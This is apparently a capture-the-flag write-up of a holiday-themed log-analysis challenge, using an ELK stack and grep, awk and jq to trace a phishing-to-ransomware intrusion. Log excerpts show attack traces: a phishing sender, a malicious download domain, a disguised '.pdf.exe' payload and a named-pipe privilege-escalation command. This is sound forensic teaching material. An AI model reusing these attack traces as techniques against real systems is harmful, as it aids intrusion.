Introduction

Towards the top left corner of the yard I’ll find Fitzy Shortstack by a tent with a destroyed satellite dish and the Elf Stack terminal:

Fitzy introduces the North Pole Elf Stack SIEM:

Fitzy Shortstack

Greetings! I’m the genius behind the North Pole Elf Stack SIEM. And oh boy, we’ve got a situation on our hands.

Our system was attacked—Wombley’s faction unleashed their FrostBit ransomware, and it’s caused a digital disaster.

The logs are a mess, and Wombley’s laptop—the only backup of the Naughty-Nice List—was smashed to pieces.

Now, it’s all up to you to help me trace the attack vectors and events. We need to figure out how this went down before it’s too late.

You’ll be using a containerized ELK stack or Linux CLI tools. Sounds like a fun little puzzle, doesn’t it?

Your job is to analyze these logs… think of it as tracking snow tracks but in a digital blizzard.

If you can find the attack path, maybe we can salvage what’s left and get Santa’s approval.

Santa’s furious at the faction fighting, and he’s disappointed. We have to make things right.

So, let’s show these attackers that the North Pole’s defenses are no joke!

Elf Stack - Setup

Terminal

The terminal starts with a welcome screen asking if I want to play Easy or Hard mode:

Skipping both for now, I’ll click on Download:

I’ll download all three files.

The “Help” button provides another overlay with instructions for the challenge. Points worth noting:

Easy is meant to be done entirely in the SIEM (containerize ELK stack), where Hard will require additional file parsing (though I am welcome to approach the challenge however I want).
The instructions for the SIEM container are given here.

Container

I’ll unzip the elf-stack-siem-with-logs.zip archive and navigate into the created elf-stack-siem directory. Here I’ll run docker compose up setup. This starts the setup container:

oxdf@corum:~/Downloads/elf-stack-siem$ docker compose up setup
[+] Running 12/12
 ✔ elasticsearch Pulled                      33.0s 
 ✔ setup 10 layers [⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿]      0B/0B      Pulled    33.0s 
   ✔ bef9b66d64c1 Pull complete               3.7s 
   ✔ a809598a97cb Pull complete               2.3s 
   ✔ b1e3cab81fe0 Pull complete               1.2s 
   ✔ 4ca545ee6d5d Pull complete               2.2s 
   ✔ c5877fdff53b Pull complete              25.0s 
   ✔ 0db2217c4e96 Pull complete               3.3s 
   ✔ a26d7e8c9bed Pull complete               4.3s 
   ✔ e8e978c35e48 Pull complete               5.0s 
   ✔ 6cf397f5af60 Pull complete               5.3s 
   ✔ 086a059acc9c Pull complete               6.2s 
[+] Running 0/0
[+] Running 5/4net  Creating                  0.0s 
 ✔ Network elf_net                   Created  0.1s 
 ✔ Volume "ess_elastisearch_data"    Created  0.0s 
 ✔ Volume "ess_logstash_queue_data"  Created  0.0s 
 ✔ Container ess_elasticsearch       Created  0.5s 
 ✔ Container ess_setup               Created  0.0s 
Attaching to ess_setup
ess_setup  | [+] Waiting for availability of Elasticsearch. This can take several minutes.
ess_setup  |    ⠿ Elasticsearch is running
ess_setup  | [+] Waiting for initialization of built-in users
ess_setup  |    ⠿ Built-in users were initialized
ess_setup  | [+] Role 'heartbeat_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] Role 'metricbeat_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] Role 'filebeat_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] Role 'logstash_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] User 'filebeat_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'kibana_system'
ess_setup  |    ⠿ User exists, setting password
ess_setup  | [+] User 'logstash_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'heartbeat_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'metricbeat_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'monitoring_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'beats_system'
ess_setup  |    ⠿ User exists, setting password
ess_setup exited with code 0 

Once it’s done, I’ll wait 60 seconds, and then run docker compose up to start the rest of the containers defined in docker-compose.yml. This can take up to 30 minutes, but it was faster on my machine. When it’s complete, it shows a message with the login information:

Elastic

Visiting http://localhost:5601 offers an Elastic Search login screen:

On giving the creds, it returns the home screen. To find the data, I’ll click “Discover” from the menu on the left side:

The initial view shows no data because the timeframe (Last 15 minutes by default) doesn’t show the event to be investigated. I’ll update that to a wide timeframe, and then zoom in to see that all the data is from September 15 and 16 2024:

Logs

The logs data can be looked at without the SIEM just with Bash commands in the Linux terminal. There are two large files:

oxdf@hacky$ du -h log_chunk_*.log
1.7G	log_chunk_1.log
1.8G	log_chunk_2.log

log_chunk_1.log starts and end on 2024-15-09:

oxdf@hacky$ head -1 log_chunk_1.log
<134>1 2024-09-15T00:10:01-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T03:10:01.304953-04:00", "hostname": "kringleSSleigH", "service": "CRON[4863]:", "message": "pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)"}
oxdf@hacky$ tail -1 log_chunk_1.log
<134>1 2024-09-15T10:58:59-04:00 VirtualStation.northpole.local WindowsEvent - - - {"EventTime": "2024-09-15 10:58:59", "Hostname": "VirtualStation.northpole.local", "Keywords": -9218868437227405312, "EventType": "AUDIT_FAILURE", "SeverityValue": 4, "Severity": "ERROR", "EventID": 4673, "SourceName": "Microsoft-Windows-Security-Auditing", "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", "Version": 0, "Task": 13056, "OpcodeValue": 0, "RecordNumber": 949076, "ProcessID": 4, "ThreadID": 8048, "Channel": "Security", "Category": "Sensitive Privilege Use", "Opcode": "Info", "SubjectUserSid": "S-1-5-21-3699322559-1991583901-1175093138-1109", "SubjectUserName": "elf_user01", "SubjectDomainName": "NORTHPOLE", "SubjectLogonId": "0x13c46de", "ObjectServer": "Security", "Service": "-", "PrivilegeList": "SeProfileSingleProcessPrivilege", "ProcessName": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "EventReceivedTime": "2024-09-15T10:58:59-04:00", "SourceModuleName": "inSecurityEvent", "SourceModuleType": "im_msvistalog", "Subject_SecurityID": "S-1-5-21-3699322559-1991583901-1175093138-1109", "Subject_AccountName": "elf_user01", "Subject_AccountDomain": "NORTHPOLE", "Subject_LogonID": "0x13C46DE", "Service_Server": "Security", "Service_ServiceName": "-", "Process_ProcessID": "0xb34", "Process_ProcessName": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ServiceRequestInformation_Privileges": "SeProfileSingleProcessPrivilege", "MoreDetails": "A privileged service was called."}
oxdf@hacky$ cat log_chunk_1.log | cut -d' ' -f2 | cut -dT -f1 | sort -u
2024-09-15

log_chunk_2.log is all on 2024-09-16:

oxdf@hacky$ cat log_chunk_2.log | cut -d' ' -f2 | cut -dT -f1 | sort -u
2024-09-16

Each line starts with space separated “? timestamp hostname event_source ? ? ? {json data}”. For example:

<134>1 2024-09-15T00:10:01-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T03:10:01.304953-04:00", "hostname": "kringleSSleigH", "service": "CRON[4863]:", "message": "pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)"}

When working directly with these files, commands like jq can be very slow, where as commands like grep are pretty fast. There are two things I’ll show that help with speed:

When I’m going to use jq to select a bunch of logs, I’ll often grep before that. grep will find lines containing some value much faster, and then jq will get the lines that have that value in a specific place.
I’ll make smaller files (ie, all the AuthLog source) to query out of.

For example, showing both, using awk to select lines based on the event_source:

oxdf@hacky$ time cat log_chunk_*.log | awk '$4 == "AuthLog"' > AuthLog.log

real	0m6.392s
user	0m4.030s
sys	0m1.621s
oxdf@hacky$ time cat log_chunk_*.log | grep AuthLog | awk '$4 == "AuthLog"' > AuthLog.log

real	0m2.501s
user	0m0.876s
sys	0m1.968s

The grep cuts the time to less than half, and awk is much faster than jq.

Process IDs

There’s an oddity in the event logs when it comes to Sysmon Process IDs. It is possible that there’s a legit reason for it, but everything I’ve researched suggests that the data was just mangled on import. This can happen when designing a CTF, or in the real world!

For example, here’s a Sysmom Process Create log:

oxdf@hacky$ cat WindowsEvent.log | grep "Process Create:" | cut -d' ' -f8- | head -1 | jq .
{
  "EventTime": "2024-09-15 05:01:52",
  "Hostname": "SecureElfGwy.northpole.local",
  "Keywords": -9223372036854775808,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 1,
  "SourceName": "Microsoft-Windows-Sysmon",
  "ProviderGuid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
  "Version": 5,
  "Task": 1,
  "OpcodeValue": 0,
  "RecordNumber": 440,
  "ProcessID": 8640,
  "ThreadID": 6872,
  "Channel": "Microsoft-Windows-Sysmon/Operational",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Process Create (rule: ProcessCreate)",
  "Opcode": "Info",
  "RuleName": "-",
  "UtcTime": "2024-09-15T05:01:52-04:00",
  "ProcessGuid": "{face0b26-f3b0-660b-7c08-000000000900}",
  "Image": "C:\\Program Files\\nxlog\\nxlog.exe",
  "FileVersion": "-",
  "Description": "-",
  "Product": "-",
  "Company": "-",
  "OriginalFileName": "-",
  "CommandLine": "\"C:\\Program Files\\nxlog\\nxlog.exe\" -c \"C:\\Program Files\\nxlog\\conf\\nxlog.conf\"",
  "CurrentDirectory": "C:\\Windows\\system32\\",
  "User": "NT AUTHORITY\\SYSTEM",
  "LogonGuid": "{face0b26-bc81-6606-e703-000000000000}",
  "LogonId": "0x3e7",
  "TerminalSessionId": 0,
  "IntegrityLevel": "System",
  "Hashes": "MD5=D2BF1F3178E70677C11C52950A12D744,SHA256=172455FF28DF99E2CAEFFFB92AD908749DACE7593EC8B94760EA4F163F746D76,IMPHASH=4FAC2CA02E73F0E9CA12C3333E24B4BD",
  "ParentProcessGuid": "{face0b26-bc80-6606-0a00-000000000900}",
  "ParentProcessId": 660,
  "ParentImage": "C:\\Windows\\System32\\services.exe",
  "ParentCommandLine": "C:\\Windows\\system32\\services.exe",
  "ParentUser": "NT AUTHORITY\\SYSTEM",
  "EventReceivedTime": "2024-09-15T05:01:52-04:00",
  "SourceModuleName": "inSysmon",
  "SourceModuleType": "im_msvistalog",
  "ProcessId": 8292,
  "MoreDetails": "Process Create:"
}

I’ll note ProcessID and ProcessId with different values! If I look at these logs from a single host, the ProcessID is the same for all of them:

oxdf@hacky$ cat WindowsEvent.log | grep "Process Create:" | cut -d' ' -f8- | jq -r '. | select(.EventID == 1 and .Hostname == "SleighRider.northpole.local") | "[\(.EventTime): \(.ProcessID) \(.ProcessId) \(.ParentProcessId)] \(.CommandLine)"' | head
[2024-09-15 05:31:55: 10014 49032 628] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Program Files\reinEDr\reinEDr\reinEDr.ps1"
[2024-09-15 05:31:55: 10014 3084 628] "C:\Program Files\nxlog\nxlog.exe" -c "C:\Program Files\nxlog\conf\nxlog.conf"
[2024-09-15 05:34:24: 10014 7408 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-15 05:37:02: 10014 6520 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 05:37:02: 10014 6248 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 05:37:02: 10014 5176 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 05:43:18: 10014 6960 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 05:43:18: 10014 1432 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 05:43:18: 10014 2696 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 05:43:32: 10014 440 628] "C:\Program Files\nxlog\nxlog.exe" -c "C:\Program Files\nxlog\conf\nxlog.conf"

My initial instinct was to use the ProcessId, as it seems to be unique to the actual process. But this fails in some cases when pivoting to non-Sysmon events, as they reference the ProcessID.

This was a bit of a mess to work through, but didn’t make the challenge unsolvable. I just needed to keep in mind that these two IDs were present and pivot off both.

Silver / Easy Mode

Questions 1-5

Question 1

How many unique values are there for the event_source field in all logs?

Clicking on event_source in the “Available fields” panel on the left shows a sample of different top values:

This is based on only 5,000 of over 2.3 million documents. Clicking “Visualize” loads a bar graph with more:

The graph is currently set on “Top 5 values of event_source”:

Clicking that will allow me to add more, but no new bars appear, as there are only 5.

From Bash, I’ll use cut to get the source and then uniq -c to get counts:

oxdf@hacky$ cat log_chunk_*.log | cut -d' ' -f4 | sort | uniq -c | sort -nr
2299324 WindowsEvent
  34679 NetflowPmacct
   7476 GreenCoat
   1398 SnowGlowMailPxy
    269 AuthLog

Answer: 5

Question 2

Which event_source has the fewest number of events related to it?

The chart and terminal output from Question 1 shows the lowest is AuthLog.

Answer: AuthLog

Question 3

Using the event_source from the previous question as a filter, what is the field name that contains the name of the system the log event originated from?

To filter on event_source of “AuthLog”, I’ll add event_source: AuthLog in the bar at the top:

The double arrows expand button will open one of these logs in a side panel:

event.hostname and hostname has the hostname the event came from.

On the command line, head -1 will give one example, log, and then cut can get just the JSON data so it can be processed by jq:

oxdf@hacky$ cat AuthLog.log | head -1 | cut -d' ' -f8- | jq .
{
  "timestamp": "2024-09-15T03:10:01.304953-04:00",
  "hostname": "kringleSSleigH",
  "service": "CRON[4863]:",
  "message": "pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)"
}

Answer: hostname (or event.hostname)

Question 4

Which event_source has the second highest number of events related to it?

The chart and output from Question 2 shows it is NetflowPmacct.

Answer: NetflowPmacct

Question 5

Using the event_source from the previous question as a filter, what is the name of the field that defines the destination port of the Netflow logs?

I’ll add the KQL to filter on this source, event_source: "NetflowPmacct", and expand one of the logs. Filtering on the string “port” shows two fields:

On command line, the same process as Question 3 works:

oxdf@hacky$ cat NetflowPmacct.log | head -1 | cut -d' ' -f8- | jq .
{
  "event_type": "purge",
  "ip_src": "172.24.25.93",
  "ip_dst": "172.24.25.25",
  "port_src": 29994,
  "port_dst": 808,
  "ip_proto": "tcp",
  "timestamp_start": "2024-09-15T10:37:43-04:00",
  "timestamp_end": "0000-00-00T00:00:00-00:00",
  "packets": 1,
  "bytes": 40,
  "src_host": "SnowSentry.northpole.local",
  "dst_host": ""
}

Answer: port_dst (or event.post_dst)

Questions 6-10

Question 6

Which event_source is related to email traffic?

Looking at the five event source types, only one has “mail” in it.

Answer: SnowGlowMailPxy

Question 7

Looking at the event source from the last question, what is the name of the field that contains the actual email text?

The KQL event_source: "SnowGlowMailPxy" filters to this event type, where I can look at an example log.

event.Body has the message.

From command line, it’s the same as Questions 3 and 5:

oxdf@hacky$ cat log_chunk_*.log | grep SnowGlowMailPxy | awk '$4 == "SnowGlowMailPxy"' > SnowGlowMailPxy.log
oxdf@hacky$ cat SnowGlowMailPxy.log | head -1 | cut -d' ' -f8- | jq .
{
  "From": "elf_user00@northpole.local",
  "To": "asnowball04@northpole.local",
  "Subject": "Welcome to the North Pole!",
  "Date": null,
  "Message-ID": "<532A9346-9F5F-4C29-BD40-CA171DD0E7DE@SecureElfGwy.northpole.local>",
  "Return-Path": "elf_user00@northpole.local",
  "Body": "Dear asnowball04,\n\nI wanted to inform you that we have a new team member joining us, [New Hire]. They will be joining our department as [Job Title]. Please extend a warm welcome and assist them with any necessary introductions and onboarding processes.\n\nLooking forward to working together!\n\nBest regards,\nelf_user00\n",
  "Received_Time": "2024-09-15T08:26:14-04:00",
  "ReceivedIP1": "172.24.25.25",
  "ReceivedIP2": "172.24.25.20"
}

Answer: Body (or event.Body)

Question 8

Using the ‘GreenCoat’ event_source, what is the only value in the hostname field?

I’ll use KQL to filter on GreenCoat (event_source: "GreenCoat" ), and then filter the “Available fields” on “hostname”:

Those fields are from all of the logs, not just the filtered ones, so most of them show no results when clicked on. For example:

The last one does:

I could also just expand out any of the logs and filter for hostname in the fields:

From the terminal, I’ll isolate the GreenCost logs, and look at the fields:

oxdf@hacky$ cat log_chunk_*.log | grep GreenCoat | awk '$4 == "GreenCoat"' > GreenCoat.log

There is no hostname field in the event JSON. That field is actually pulled from the data before the JSON, before the event_source:

oxdf@hacky$ cat GreenCoat.log | head -1
<134>1 2024-09-15T05:57:55-04:00 SecureElfGwy GreenCoat - - - {"ip": "172.24.25.93", "user_identifier": "elf_user03", "timestamp": "2024-09-15T05:57:55-04:00", "method": "CONNECT", "url": "disc601.prod.do.dsp.mp.microsoft.com:443", "http_protocol": "HTTP/1.1", "status_code": 200, "response_size": 0, "protocol": "HTTPS", "additional_info": "outgoing via 172.24.25.25", "host": "SnowSentry"}

I’ll get that with cut on space getting the third item, and use sort -u to get unique entries:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f3 | sort -u
SecureElfGwy

Answer: SecureElfGwy

Question 9

Using the ‘GreenCoat’ event_source, what is the name of the field that contains the site visited by a client in the network?

Looking at the fields in an example log, event.url has the URL visited:

An example raw log shows this as well:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | head -1 | jq .
{
  "ip": "172.24.25.93",
  "user_identifier": "elf_user03",
  "timestamp": "2024-09-15T05:57:55-04:00",
  "method": "CONNECT",
  "url": "disc601.prod.do.dsp.mp.microsoft.com:443",
  "http_protocol": "HTTP/1.1",
  "status_code": 200,
  "response_size": 0,
  "protocol": "HTTPS",
  "additional_info": "outgoing via 172.24.25.25",
  "host": "SnowSentry"
}

Answer: url (or event.url)

Question 10

Using the ‘GreenCoat’ event_source, which unique URL and port (URL:port) did clients in the TinselStream network visit most?

I’ll filter on “url” in the “Available fields” and click “Visualize”. At first, the “Other” field dwarfs all the others. I’ll turn that off in the options:

The resulting graph shows the top five values:

I’ll use sort, uniq, and head to get the top five most visited urls:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | jq -r '.url' | sort | uniq -c | sort -nr | head -5
pagead2.googlesyndication.com:443
ib.adnxs.com:443
securepubads.g.doubleclick.net:443
cdn.cookielaw.org:443
cm.g.doubleclick.net:443

Answer: pagead2.googlesyndication.com:443

Questions 11-15

Question 11

Using the ‘WindowsEvent’ event_source, how many unique Channels is the SIEM receiving Windows event logs from?

Just like previously, I’ll use KQL to filter on WindowEvent sources, and then use the available fields to find the event.Channel field. I’ll visualize that, and up the count to top 10, but still only five show up:

In the raw logs, I’ll get them into a file:

oxdf@hacky$ cat log_chunk_*.log | grep WindowsEvent | awk '$4 == "WindowsEvent"' > WindowsEvent.log

An example file shows there is a Channel field:

oxdf@hacky$ cat WindowsEvent.log | head -1 | cut -d' ' -f8- | jq .
{
  "Provider_Name": "Microsoft-Windows-PowerShell",
  "Provider_Guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
  "EventID": 40962,
  "Version": 1,
  "Level": 4,
  "Task": 4,
  "Opcode": 2,
  "Keywords": "0x0",
  "TimeCreated_SystemTime": "2024-09-15T00:10:01.000000Z",
  "EventRecordID": 61068,
  "Correlation_ActivityID": "{aead5189-c9cf-46b6-bf16-0e6721070de3}",
  "ParentProcessID": 2638,
  "ThreadID": 9868,
  "Channel": "Microsoft-Windows-PowerShell/Operational",
  "Computer": "SleighRider.northpole.local",
  "Security_UserID": "S-1-5-21-3699322559-1991583901-1175093138-1111"
}

jq can give the channel value and then sort -u will deduplicate to see there are five (ignoring null):

oxdf@hacky$ cat WindowsEvent.log | cut -d' ' -f8- | jq -r '.Channel' | sort | uniq -c | sort -nr
2268402 Security
Microsoft-Windows-Sysmon/Operational
Microsoft-Windows-PowerShell/Operational
null
System
Windows PowerShell

Answer: 5

Question 12

What is the name of the event.Channel (or Channel) with the second highest number of events?

Looking at the chart and out above, clearly Security is the most. The third bar is overwriting the second, but hovering over it shows the result:

Answer: Microsoft-Windows-Sysmon/Operational

Question 13

Our environment is using Sysmon to track many different events on Windows systems. What is the Sysmon Event ID related to loading of a driver?

This is the kind of thing that can be looked up on a site like Ultimate IT Security.

Answer: 6

Question 14

What is the Windows event ID that is recorded when a new service is installed on a system?

This one can be looked up as well, here.

Answer: 4697

Question 15

Using the WindowsEvent event_source as your initial filter, how many user accounts were created?

This is tricky. The event log for the creation of a new user account is Security Log Event ID 4720. I’ll use KQL to filter to those, but there’s no returns:

I’ll check my syntax by finding an event ID that does exist and using the same KQL with that, and it works. So the answer is just zero.

From the command line, I’ll write a jq query to output the events with ID 4697 (the ID from the previous question) one per line (-c) and see there are 15:

oxdf@hacky$ cat WindowsEvent.log | grep 4697 | cut -d' ' -f8- | jq -c '. | select(.EventID == 4697)' | wc -l
15

For this question, it should be 4720, and there are none:

oxdf@hacky$ cat WindowsEvent.log | grep 4720 | cut -d' ' -f8- | jq -c '. | select(.EventID == 4720)' | wc -l
0

This is another example of where the extra grep really helps. Without it, the query takes over 30 seconds, but with it only 2 seconds!

Answer: 0

After submitting, I’ve completed Silver:

Fitzy

On solving Silver, Fitzy is pleased:

Fitzy Shortstack

Fantastic job! You worked through the logs using the ELK stack like a pro—efficient, quick, and spot-on. Maybe, just maybe, this will turn Santa’s frown upside down!

Up for the real challenge? Take a deep dive into those logs and query your way through the chaos. It might be tricky, but I know your adaptable skills will crack it!

Gold / Hard Mode

Questions 1-5

Question 1

What is the event.EventID number for Sysmon event logs relating to process creation?

Sysmon Event ID 1 is Process creation.

Answer: 1

Question 2

How many unique values are there for the ‘event_source’ field in all of the logs?

This is the same as Question 2 Easy.

Answer: 5

Question 3

What is the event_source name that contains the email logs?

This is pretty much the same question as Question 6 Easy.

Answer: SnowGlowMailPxy

Question 4

The North Pole network was compromised recently through a sophisticated phishing attack sent to one of our elves. The attacker found a way to bypass the middleware that prevented phishing emails from getting to North Pole elves. As a result, one of the Received IPs will likely be different from what most email logs contain. Find the email log in question and submit the value in the event ‘From:’ field for this email log event.

I’ll update the KQL to filter on the mail logs, event_source: "SnowGlowMailPxy". Looking at an example log, there are three fields having to do with IP:

There are 1,398 logs of this type, and looking at host.ip and event.ReceivedIP1, they both have one value. For example:

event.ReceivedIP2 has an outlier:

That outlier is a public IP, unlike the 172.24.0.0/16 IP. Clicking the + next to the “0.1%” will add that filter, which is a single log:

The event.From field is kriskring1e@northpole.local:

From the Linux terminal, I’ll look at an example log:

oxdf@hacky$ cat SnowGlowMailPxy.log | head -1 | cut -d' ' -f8- | jq .
{
  "From": "elf_user00@northpole.local",
  "To": "asnowball04@northpole.local",
  "Subject": "Welcome to the North Pole!",
  "Date": null,
  "Message-ID": "<532A9346-9F5F-4C29-BD40-CA171DD0E7DE@SecureElfGwy.northpole.local>",
  "Return-Path": "elf_user00@northpole.local",
  "Body": "Dear asnowball04,\n\nI wanted to inform you that we have a new team member joining us, [New Hire]. They will be joining our department as [Job Title]. Please extend a warm welcome and assist them with any necessary introductions and onboarding processes.\n\nLooking forward to working together!\n\nBest regards,\nelf_user00\n",
  "Received_Time": "2024-09-15T08:26:14-04:00",
  "ReceivedIP1": "172.24.25.25",
  "ReceivedIP2": "172.24.25.20"
}

There are two ReceivedIP fields. The second one has the unusual IP:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.ReceivedIP1' | sort | uniq -c | sort -nr
   1398 172.24.25.25
oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.ReceivedIP2' | sort | uniq -c | sort -nr
   1397 172.24.25.20
      1 34.30.110.62

I’ll filter on that:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '. | select(.ReceivedIP2 != "172.24.25.20") | .From'
kriskring1e@northpole.local

Answer: kriskring1e@northpole.local

Question 5

Our ElfSOC analysts need your help identifying the hostname of the domain computer that established a connection to the attacker after receiving the phishing email from the previous question. You can take a look at our GreenCoat proxy logs as an event source. Since it is a domain computer, we only need the hostname, not the fully qualified domain name (FQDN) of the system.

Interesting, the email looks very much like a phishing email:

I want to know what computer clicked on the link, so I’ll filter to get the GreenCoat logs as well as a url field containing the malicious domain: event_source: "GreenCoat" and event.url: *holly*. This returns one result:

In jq, the contains filter will help select url fields with “holly”:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | jq -r '. | select(.url | contains("holly")) | .host'
SleighRider

Answer: SleighRider

Questions 6-10

Question 6

What was the IP address of the system you found in the previous question?

Looking at the same log, the event.ip value is 172.24.25.12. From command line, it’s:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | jq -r '. | select(.url | contains("holly")) | .ip'
172.24.25.12

Answer: 172.24.25.12

Question 7

A process was launched when the user executed the program AFTER they downloaded it. What was that Process ID number (digits only please)?

The Greencoat logs show the link was clicked at 10:36:26 on Sep 15, 2024. I’ll filter to get process creation events on that computer: event_source: "WindowsEvent" and event.EventID: 1 and hostname: SleighRider* .

At 10:36:36, there’s a log showing Chrome downloading the zip archive:

Strangely, there’s two ProcessID fields (as discussed above):

It’s a bit cleaner to see the logs just after the download:

oxdf@hacky$ cat WindowsEvent.log | grep "Process Create:" | cut -d' ' -f8- | jq -r '. | select(.EventID == 1 and .Hostname == "SleighRider.northpole.local" and .EventTime > "2024-09-15 10:36:26") | "[\(.EventTime): \(.ProcessID) \(.ProcessId) \(.ParentProcessId)] \(.CommandLine)"' 
[2024-09-15 10:36:36: 10014 5272 1496] "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument http://hollyhaven.snowflake/howtosavexmas.zip
[2024-09-15 10:37:02: 10014 2972 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:13: 10014 3572 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:20: 10014 8848 8524] consent.exe 8524 558 000001B2CD232F70
[2024-09-15 10:37:50: 10014 8096 5680] "C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe" 
[2024-09-15 10:38:22: 10014 6484 628] cmd.exe /c echo ddpvccdbr &gt; \\.\pipe\ddpvccdbr
[2024-09-15 10:38:34: 10014 4336 8096] powershell.exe
[2024-09-15 10:42:00: 10014 9012 628] C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
[2024-09-15 10:42:00: 10014 9840 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 10:42:00: 10014 10220 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:42:37: 10014 9848 1256] taskhostw.exe -RegisterDevice -ProtectionStateChanged -FreeNetworkOnly
[2024-09-15 10:42:37: 10014 532 772] C:\Windows\System32\smartscreen.exe -Embedding
[2024-09-15 10:43:33: 10014 9292 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:44:09: 10014 8220 608] powershell.exe
[2024-09-15 10:44:15: 10014 2932 8220] "C:\Windows\system32\ipconfig.exe"
[2024-09-15 10:44:33: 10014 9240 1256] "gpupdate.exe" /target:computer
[2024-09-15 10:45:37: 10014 5748 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 10:45:37: 10014 1108 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 10:45:37: 10014 7004 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:46:27: 10014 4412 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
[2024-09-15 10:46:33: 10014 8064 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
[2024-09-15 10:49:40: 10014 8364 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:50:02: 10014 836 1256] "gpupdate.exe" /target:user
[2024-09-15 10:50:02: 10014 8240 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:00:21: 10014 9896 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:04:24: 10014 9284 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:8
[2024-09-16 11:15:21: 10014 7752 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:27:22: 10014 7936 628] C:\Windows\ZiyfDiiO.exe
[2024-09-16 11:27:22: 10014 532 7936] powershell.exe
[2024-09-16 11:27:36: 10014 2280 532] "C:\Windows\system32\whoami.exe"
[2024-09-16 11:28:16: 10014 9844 628] C:\Windows\YdTRctss.exe
[2024-09-16 11:28:16: 10014 928 7936] powershell.exe
[2024-09-16 11:30:21: 10014 6304 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:43:32: 10014 9752 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-16 11:45:21: 10014 7668 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
